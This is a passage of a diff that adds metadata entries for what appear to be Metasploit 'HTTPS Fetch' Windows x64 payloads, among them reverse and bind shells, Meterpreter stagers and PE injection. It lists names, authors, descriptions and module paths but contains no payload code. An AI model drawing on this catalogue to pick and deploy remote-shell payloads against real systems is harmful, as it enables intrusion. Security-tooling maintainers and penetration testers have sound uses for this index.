"windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/https/x64/encrypted_shell_reverse_tcp": { + "name": "HTTPS Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/exec": { + "name": "HTTPS Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/https/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/https/x64/loadlibrary": { + "name": "HTTPS Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/https/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/https/x64/messagebox": { + "name": "HTTPS Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/https/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_http": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_https": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_winhttp": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/meterpreter/reverse_winhttps": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/meterpreter_bind_named_pipe": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_bind_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_http": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_https": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 